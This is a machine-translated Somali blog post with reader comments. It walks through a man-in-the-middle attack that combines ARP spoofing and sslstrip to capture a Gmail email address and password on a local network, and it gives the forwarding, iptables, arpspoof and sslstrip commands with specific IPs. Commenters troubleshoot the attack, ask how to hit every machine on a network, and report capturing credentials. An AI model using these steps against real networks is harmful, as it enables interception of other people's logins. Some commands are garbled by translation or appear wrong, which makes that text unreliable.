ArpSpoofing iyo SSlstrip oo ficil ah.

Salaan Bloggers.

Maanta waxaan hayaa muunad yar oo ah sida halista ay u noqon karto in lagu xidho shabakad kasta oo aan la hubin oo kuwa badan oo naga mid ahi jecel yihiin.

Maanta, waxaan u isticmaali doonaa ArpSpoofing Sslstrip si aan u helo lambarka sirta ah ee 'Gmail'. Si deegaanka looga dhigo mid la xakameeyo, waxaan sameeyay koonto la yiraahdo "testarp@gmail.com".

Maaddaama aanan aad u jeclayn hordhaca, aan hoos ugu degno ganacsiga.

Anigu mas'uul kama ihi wakhti kasta wixii ay ku samayn karaan macluumaadka soo socda. Waxaan u sameeyaa si gaar ah ujeeddooyin waxbarasho

DEEGAANKA

Tijaabadan waxa aan hayno waa kuwan soo socda:

1. Weerar: Waa desktop-kayga ama kumbuyuutarka desktop-ka ee leh Debian Wheezy. Keydadka waxaad ka rakiban kartaa sslstrip y dhuuqin si loo helo arppoofing

2. Dhibbane: Dhibbanuhu waa Tablet-ka Android-ka oo kaliya doonaya inuu ka arko mailkiisa marinka biraawsarka.

3. Dhexdhexaad: Dhexda waa aniga Cisco DPC2425 router

CINWAANADA.

Cinwaanka Weerarka: 172.26.0.2

Cinwaanka router: 172.26.0.1

Cinwaanka Dhibbanaha: 172.26.0.8

Weerarka:

Si aad wax yar uga fahanto sida weerarku u shaqeeyo, waxaad aadi kartaa midkeygii hore POST

Waxa ugu horeeya ee aan ku sameyn doono weerarkan waa inaan dhaqaajino dhanka hore si markaa kumbuyuutarkeena uu macluumaadka ugu gudbiyo dhibanaha iyagoon ogaanin. (Haddii kale waxay noqon doontaa diidmada weerarada adeegyada)

Taas waxaan u isticmaali doonaa:

echo "1" > /proc/sys/net/ipv4/ip_forward iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports 8080

arpspoof -i eth0 -t 172.26.0.8 172.26.0.1
arpspoof -i eth0 -t 172.26.0.1 172.26.0.2
sslstrip -a -w desdelinux -l 8080

Amar kasta daaqad konsol toos ah.

Hadda haddii aan samayno dabada -f desdelinux Waxaan u aragnaa macluumaadka si toos ah oo toos ah

1

Marka markaa sidee ku helnaa waxa aan dooneyno?

Aynu marka hore galno boostadayada ku taal Kiniinka. Markaad gasho, waxaan aragnaa kumanaan iyo kumanaan shey inay ka muuqdaan konsoleheena.

Hadda markay dhammaatay aynu furno galkeena”desdelinux" oo leh nano

nano desdelinux

iyadoo la adeegsanayo Control + W waxaan raadineynaa wax la yiraahdo SECURE POST.

Oo waxaan arki doonaa wax sidan oo kale ah.

2

Khadadkaas weyn ee aan la arki karin waxaa ka mid ah e-mayga dhibbanaha iyo erayga sirta ah.

Marka waxaan u ordaynaa dhanka midig ilaa aan aakhirka ka aragno nalka dhamaadka godka.

3

Munaasabad kale ayaynu arki doonaa sida aan waxoogaa uga badbaadin karno weerarradan.

Salaan


27 faallooyin, ka tag taada

Ka tag faalladaada

cinwaanka email aan la daabacin doonaa. Beeraha loo baahan yahay waxaa lagu calaamadeeyay la *

*

*

  1. Masuul ka ah xogta: Miguel Ángel Gatón
  2. Ujeedada xogta: Xakamaynta SPAM, maaraynta faallooyinka.
  3. Sharci: Oggolaanshahaaga
  4. Isgaarsiinta xogta: Xogta looma gudbin doono dhinacyada saddexaad marka laga reebo waajibaadka sharciga ah.
  5. Kaydinta xogta: Macluumaadka ay martigelisay Shabakadaha Occentus (EU)
  6. Xuquuqda: Waqti kasta oo aad xadidi karto, soo ceshan karto oo tirtiri karto macluumaadkaaga.

  1.   @Jlcmux dijo

    Waxaan fursaddan uga faa'iideysanayaa inaan dhaho markii boostada la daabacay, amarradu sax ma ahayn.

    Amarka iptables ee dhamaadka ayaa la la'yahay 8080 kii ku hadhay xariiq kale. Ka dibna amarrada arpspoof dhammaantood waxay ku jireen isla xariiq. Amar kastaa wuxuu ku socdaa xariiq kale.

    Waxaan rajeyneynaa in tifaftiraha uu arko uuna hagaajin karo.

    Thanks.

    1.    Buugga Isha dijo

      Waan sameeyay sixitaanka aad sheegayso, taasi waa caadi?

      Haddii aad geli doontid koodh gelitaan doorbid ah, isticmaal aragtida HTML, oo ​​xaqiiji in maqaalka sax yahay ka hor inta aanad u dirin sugitaanka. Mahadsanid.

  2.   Luis dijo

    Waa murugo in la ogaado in kuweena aan aqoonta lahayn ay sidaa u nugul yihiin. Macluumaad aad u wanaagsan xitaa markaan wax yar ka fahmo mowduuca waxaan garwaaqsanahay muhiimadda. Mahadsanid!
    Salaan

  3.   giskard dijo

    Laakiin taasi waxay shaqeysaa oo keliya haddii qofka wax weeraray iyo dhibanaha ay isku shabakad yihiin. Sikastaba xaalku ha ahaadee, aniga waxay ila tahay in haddii (aad isku shabakad tahay) aad isku xirto adoo adeegsanaya HTTPS taas oo aan dhicin maxaa yeelay xogta waa la duubay kahor intaadan mashiinkaaga ka bixin. Haddii aad ku xirto HTTP (la'aanteed S) waxaan u maleynayaa in xitaa fiirinta fiilada shabakada aad aragto furayaasha.

    1.    @Jlcmux dijo

      Run maahan. Waxaan jabsanayaa lambarka sirta ah ee gmail oo hadaad ogaato gmail wuxuu adeegsadaa https. Marka? Muhiimadu waxay tahay in kasta oo https amni yahay, hadana waxay kuxirantahay http. Marka sidaa uma bad badna.

      Wax badan ha ka qiran https in S uusan u aheyn Superman ee ay tahay "badbaado"

    2.    Rten dijo

      waxay la shaqeysaa https la'aan ama la'aan, waxaan ku tijaabiyay Linux Linux gaar ah oo takhasus leh waxayna u shaqeysaa dhibaato la'aan

    3.    Buugga Isha dijo

      Waxaad si hufan ugu adeegsan kartaa inaad cashar u dhigto kuwa xada Wi-Fi-gaaga. 😀

      Waa wax ka yar ama ka yar sidii ay u sheegeen waqti dheer ka hor barta Chema Alonso:

      http://www.elladodelmal.com/2013/04/hackeando-al-vecino-hax0r-que-me-roba.html
      http://www.elladodelmal.com/2013/04/hackeando-al-vecino-hax0r-que-me-roba_5.html

      1.    Rayonant dijo

        Ostia, wax weyn ayey qabataa! / Kadibna waxay u sheegaan nacasnimadayda mar kasta oo aan isticmaalo VPN marka ay tagayaan inay hubiyaan koontada bangiga…). Adoo maraya waa inaad aragtaa sida dadka caqli-xumadu ugu jiraan faallooyinka ... haddii aakhirka ay wax xadayaan ...

        1.    Waqti dheer 3000 dijo

          Hadda waxaan u baahanahay inaan qaadanno casharro ku saabsan sida loo abuuro loona bixiyo adeeggaaga VPN u gaarka ah.

      2.    Daniel dijo

        Sheekada aad xiriirineyso waa mid aad u xiiso badan, xitaa waxay u muuqataa mid mudan buug cusub, tanina waxay igu xusuusineysaa markii aan adeegsaday internet-ka deriskeyga in kastoo aan idhaahdo waan ogahay mowduuca, waxaan u maleynayaa inaanan weligey arki karin cabirka dhabta ah ee halista aan yeelan karo ugu dambayn, nasiib wanaag aniga ahaan, waxay kaliya u beddeleen lambarka sirta ah ee WPA2 waana halkaas meesha sheekadayda ISP ay ka bilaabatay haha

    4.    Mauricio dijo

      Taasi waa sababta cinwaanku u leeyahay Sslstrip ficil ahaan.

      Way shaqeysaa, illaa iyo inta weeraryahanku dhexda ku jiro

  4.   kolkiiba dijo

    Waa maxay mawjada aad ka shaqeyso prism? -.-
    no.
    Maxaad sugeysaa inaad soo dirto codsigaaga XD
    Salaan
    post wanaagsan

  5.   auroszx dijo

    Xiiso leh, mar dambe ayaan sameyn doonaa imtixaan waxbarasho ... Waxaa laga yaabaa inaan xitaa ka saari karo lambarka sirta ah ee WiFi oo aan ku raaxeysto xoogaa 😛
    Fursad kasta, ma sameyn kartaa wax la mid ah si aad ugu dirto bogag kala duwan kuwa bartilmaameedka la codsaday? Tusaale ahaan, waxay rabaan inay furaan Facebook anigana waxaan u weeciyaa Google? 😛

    1.    @Jlcmux dijo

      Haa. Laakiin dhammaantood waa duub aad u kala duwan.

      Malaha gadaal baan soo dhigi doonaa.

  6.   sooraan dijo

    boostada aad u wanaagsan, mowduucyadan waa kuwo aad wax u baraya, hadda waxaan u baahanahay inaan awoodno inaan ka hortagno weerarkan, maaddaama qaar (sida aniga oo kale) ay ku xirmaan shabakadaha bulshada (tusaale ahaan jaamacadda) way fiicnaan laheyd in laga fogaado.

    Waad ku mahadsan tahay!

  7.   kaliya-kale-dl-isticmaale dijo

    Way ii shaqeyn weyday 🙁

  8.   woqr dijo

    Waxbaa igu fashilmay halkan, marka laga reebo xaqiiqda ah in isku xirnaanta https ay ku kaydsan yihiin shahaado server ah (marka aad shahaadada ku haysato mashiinkaaga, biraawsarkaaga ayaa mas'uul ka ah qarinta) iyadoo la adeegsanayo iptable-ka waxaad u wareejin kartaa dekedda 80 (http), ma ahan 443 oo ah https

    1.    @Jlcmux dijo

      Taasna waan u maleeyay. Muhiimadu waxay tahay in kasta oo https uu "aamin yahay" hadana nasiib daro waxay kuxirantahay http. Marka sslstrip ayaa ka faa'iideysanaya taas, waxay ka dhigeysaa biraawsarka inuu aamino inuu adeegsanayo aqoonsiyada https laakiin maahan.

      1.    woqr dijo

        xaaraan quduus ah! laakiin biraawsarka waa inuu arkaa digniin sida "shahaadadan waxay ka timid goob laga shakisan yahay ama wax la mid ah" ... Xaqiiqdii waa inaan sameeyaa baaritaano XD

        1.    @Jlcmux dijo

          Maya, gabi ahaanba waxba ma soo baxaan.

  9.   kaliya-kale-dl-isticmaale dijo

    Ugu dambeyntii way ii shaqeysay
    Waxaan ku xiranahay shabakad WEP ah oo leh lambar sir ah, waxayna si toos ah ii tustay furaha.

    Weydiin. Miyaad samayn kartaa isla nidaamkan laakiin dhammaan kombiyuutarada ku xiran shabakadda, halkii aad ka yeelan lahayd hal dhibbane?

    1.    @Jlcmux dijo

      Haa waad awoodaa. Laakiin ma aanan samayn tijaabooyin. Isku day naftaada oo noo sheeg sida aad tahay.

  10.   Dhimasho 19 dijo

    Waxa kaliya ee aan ku helo tan waa in mashiinka dhibbanaha uu khad ka baxo, laakiin sslstrip wax iima tusayo: /

    1.    @Jlcmux dijo

      Waxaad ubaahantahay inaad dajiso firewall daqiiqad. Ama ugu yaraan awood u yeelo isku xirnaanta soo socota.

  11.   Mr madow dijo

    Aniga iyo baaritaanka waxaan arki karnaa oo kaliya magaca iyo lambarka sirta ah ee bogga facebook, gmail ma aanan helin wax natiijo ah oo ku saabsan qoraalka, sidoo kale waxaan ubaahanahay kaliya qadka arpspoof «arpspoof -i -t«. Dhinaca kale, mashiinka dhibbanaha ma furi karin bogagga qaarkood. Waan sii wadi doonaa baaritaanka, waa mid aad u xiiso badan. Caawinta kuwa isticmaala Manjaro, xirmooyinka ay ku rakibayaan waa: dsniff (halkan waa arpspoff), qalloocan iyo python2-pyopenssl. Sslstrip ayaa lagala soo bixi karaa halkan: http://www.thoughtcrime.org/software/sslstrip/
    Si aad u socodsiiso $ python2 sslstrip.py
    Thanks.

  12.   Mr madow dijo

    Ma soo bixin laakiin khadka arpspoof waa: #arpspoof -i int -t ip-victim ip-router

  13.   Gilbert dijo

    fiiri waxaan sameeyaa sida saxda ah ee aad dhahdo:

    echo "1"> / proc / sys / net / ipv4 / ip_forward iptables -t nat -A PREROUTING -p tcp –destination-port 80 -j SALDHIG –in-dekedaha 8080

    arpspoof -i eth0 -t 172.26.0.8 172.26.0.1
    arpspoof -i eth0 -t 172.26.0.1 172.26.0.2

    dhibaatadu waxay tahay dhibanaha oo ah pc kale oo aan halkan ku haysto qolkeyga, wax xiriir ah oo aan la leeyahay ma jirto ilaa iyo meesha ay tahay inaan dib u bilaabo routerka, maxaan sameyn karaa oo i caawin kara.

    Midda kale, waxaan la shaqeynayaa mishiin kumbuyuutar ah, markii aan fulinayo amarka iwconfig, wlan0 ma muuqdo, mana markaan fulinayo ifconfig, si kastaba ha noqotee, haddii aan internetka ku haysto mishiinkeyga meertada ah, maxaa leh interface eth0.